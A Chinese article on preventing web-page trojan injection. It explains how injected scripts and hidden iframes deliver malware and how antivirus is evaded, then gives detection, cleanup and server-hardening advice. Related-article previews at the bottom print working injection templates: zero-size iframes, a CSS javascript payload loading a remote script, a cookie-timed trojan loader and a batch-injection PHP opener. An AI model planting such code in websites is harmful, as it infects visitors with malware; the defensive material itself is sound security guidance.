预防网页挂马的方法总结

预防网页挂马的方法总结:

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的工作原理及种类、常见方式、执行方式、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

1:网页挂马工作原理的种类.

(1)工作原理:

    作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地

(2)种类:

    目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。详见网页挂马方式和技巧大汇总

2:常见方式

(1)将木马伪装为页面元素。木马则会被浏览器自动下载到本地。

(2)利用脚本运行的漏洞下载木马

(3)利用脚本运行的漏洞释放隐含在网页脚本中的木马

(4)将木马伪装为缺失的组件,或和缺失的组件捆绑在一起(例如:flash播放插件)。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。

(5)通过脚本运行调用某些com组件,利用其漏洞下载木马。

(6)在渲染页面内容的过程中利用格式溢出释放木马(例如:ani格式溢出漏洞)

(7)在渲染页面内容的过程中利用格式溢出下载木马(例如:flash9.0.115的播放漏洞)

3:执行方式

(1)利用页面元素渲染过程中的格式溢出执行shellcode进一步执行下载的木马

(2)利用脚本运行的漏洞执行木马

(3)伪装成缺失组件的安装包被浏览器自动执行

(4)通过脚本调用com组件利用其漏洞执行木马。

(5)利用页面元素渲染过程中的格式溢出直接执行木马。

(6)利用com组件与外部其他程序通讯,通过其他程序启动木马(例如:realplayer10.5存在的播放列表溢出漏洞)

在与网马斗争的过程中,为了躲避杀毒软件的检测,一些网马还具有了以下行为:

  --6.1 修改系统时间,使杀毒软件失效

  --6.2 摘除杀毒软件的HOOK挂钩,使杀毒软件检测失效

  --6.3 修改杀毒软件病毒库,使之检测不到恶意代码。

  --6.4 通过溢出漏洞不直接执行恶意代码,而是执行一段调用脚本,以躲避杀毒软件对父进程的检测。

4:如何检测网页是否被挂马。

(1):专业检测工具,D盾 web查杀  点此进入

(2):google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测网站是否安全可点此查看。

 5:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。
如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)或者利用当初的备份网站文件进行全覆盖

6:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。点此查看robots.txt使用方法。

拓展阅读

 (1)挂马要指标而且治本。治标用上面的方法就可以,结合挂马清理工具,清理挂马,或者用备份程序覆盖;

 (2)只修改IIS以及网站不够,必须强化服务器安全设置,包括服务器上的软件的安全,特别是MySQL和SQLServer,磁盘权限设置,网站独立权限设置(防止跨站),安装木马   实时防御软件。这里,我给大家推荐 护卫神,他拥有一系列免费和收费软件和服务,包括主机管理系统,挂马清理软件,防入侵系统等。技术专业。

「网页挂马」又称为网页隐藏式恶意连结。简单来说,其攻击模式分成四个步骤:

1. 黑客攻击企业、政府或知名网站,仅植入一段恶意连结而不窜改网页外观;或设立恶意网站,透过各种宣传手法,吸引民众浏览。

2. 使用者浏览该网站,由于黑客并未窜改网页外观,因此不会产生警觉。

3. 使用者看不到这个连结,也无须点选恶意连结,只要浏览该网站,就会背景导向联机至黑客预先设计好的陷阱。

4. 在不知情的状况下,使用者被植入间谍软件/木马程序。

感谢阅读,希望能帮助到大家,谢谢大家对本站的支持!

(0)

相关推荐

  • 阻止网页挂马的若干工具小集合

    那么,除了在Web开发的时候注意以外,有什么有效的工具可以对抗SQL注入攻击? 今天,微软和惠普的安全部门合作发布了三个工具,分别是: 微软SQL注入攻击源码扫描器:Microsoft Source Code Analyzer for SQL Injection (MSCASI).这个工具给网站开发人员使用.是一个静态扫描ASP代码的工具,可以查找发现第一类和第二类的SQL注入攻击漏洞.工具下载地址: http://support.microsoft.com/kb/954476 惠普的 Scra

  • php下批量挂马和批量清马代码

    复制代码 代码如下: <?php function gmfun($path=".") { $d = @dir($path); while(false !== ($v = $d->read())) { if($v == "." || $v == "..") continue; $file = $d->path."/".$v; if(@is_dir($file)) { gmfun($file); } else {

  • 数据库中的内容字段被挂马的替换方法 SQL注入

    清除了sqlsever中的一些挂马字段,现在总结sqlsever批量替换数据库挂马字段一文,希望可以帮助有需要的人. [处理方法] 1.先备份数据,防止删除挂马字段的时候,丢失数据: 2.对挂马的表中的字段text小于8000执行以下语句(网上的很多软件与方法都是针对text小于8000的,这个解决方法你可以参考) 代码如下: 如表news 字段context 挂马字段是 <Script Src=http://c.n%75clear3.com/css/c.js></Script>

  • 最新的无权限挂马方式

    还有在国外的一些机器上,什么权限都拿到了也不知道他怎么弄的,什么都不让写,好不容易写个文件没一会又改回去了,真的让人很!#$%%#%^#%^,据说就有一种软件能监视重要的文件,一旦发现更改就会给恢复过去,譬如他监视web目录的话我们就不能更改他网站的任何内容了.不过,看了很多大虾的文章,自己也略微研究了下,也总算琢磨点东西出来,不用写任何文件就可以实现将别人的页面涂改和大家经常传说的挂马等等后果,这里就给大家介绍下,那些只知道勤快的管理员也要小心了! 大家知道,我们浏览网站的时候都是服务器将信息

  • 挂马代码 网页挂马分析

    如今网民上网可算是提心吊胆,面对病毒,也许杀毒软件还能防止一二,但如果遇到网页中挂马行为,甚至直接将用户当前机所安装的杀毒软件直接强行关闭,那么其后果是不言而喻的.如今的网页有马行为也不像以前那么单一,甚至不出现下载提示,直接从后台开始下载运行其马,然后秘密的收集用户信息并返溃到恶意者手中.     网马危害     如果一台正常的网络服务器被恶意用户入侵,其网页被挂马,在一定程度上可以说是网页被篡改,其危害是巨大的,随着用户访问流量的增多,会造成此马的传播性越发增大,由于其隐蔽性比较强,导至很

  • js cookies 常见网页木马挂马代码 24小时只加载一次

    复制代码 代码如下: <div style='display:none'> <script type="text/javascript"> function goad(){ var Then = new Date() Then.setTime(Then.getTime() + 2*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookier1

  • dos之for命令实现扫描网段的端口,用于辅助解决ARP挂马

    不需要任何工具,dos命令扫描一个网段的全部端口!  在win2000下开一个dos窗口,然后执行  for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389  这样192.168.0.x这个段的所有开放3389端口得主机都会暴露  这条命令执行后  会在任务栏开254个小窗口  然后telnet链接失败的窗口会在大约5秒后自动退出  剩下的窗口就是相对应开放端口的主机了  看一下小窗口的标题可以得知主机的ip地址  如

  • Asp常见挂马方式大总结

    一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 其中"地址"处可以输入恶意网站链接等 二:js文件挂马 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等. 三:js变形加密 <SCRIPT language="J

  • 最新病毒之SXS病毒专杀方式,最近挂马严重

    [%repeat_0 match="/data/option"%] [%=@title%] [%=@count%]票 [[%=@percent%]%]  [%_repeat_0%] SXS.EXE这是一个盗取QQ帐号密码的木马病毒,特点是可以通过可移动磁盘传播.该病毒的主要危害是盗取QQ帐户和密码:该病毒还会结束大量反病毒软件,降低系统的安全等级.  中毒症状:电脑分区双击不能自动打开或者很难打开,用右键打开可以!这是最显见的症状!  解决方式:网上已经有很多手动删除的方式!  现在有

  • 利用css实现挂马的代码

    body {  background-image: url('javascript:document.write("<script src=http://www.jb51.net/9xiao.js></script>")') } 9xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")

  • 网页挂马方式整理及详细介绍

    网页挂马方式 一:框架挂马 <iframe src=地址 width=0 height=0></iframe>  二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script>

随机推荐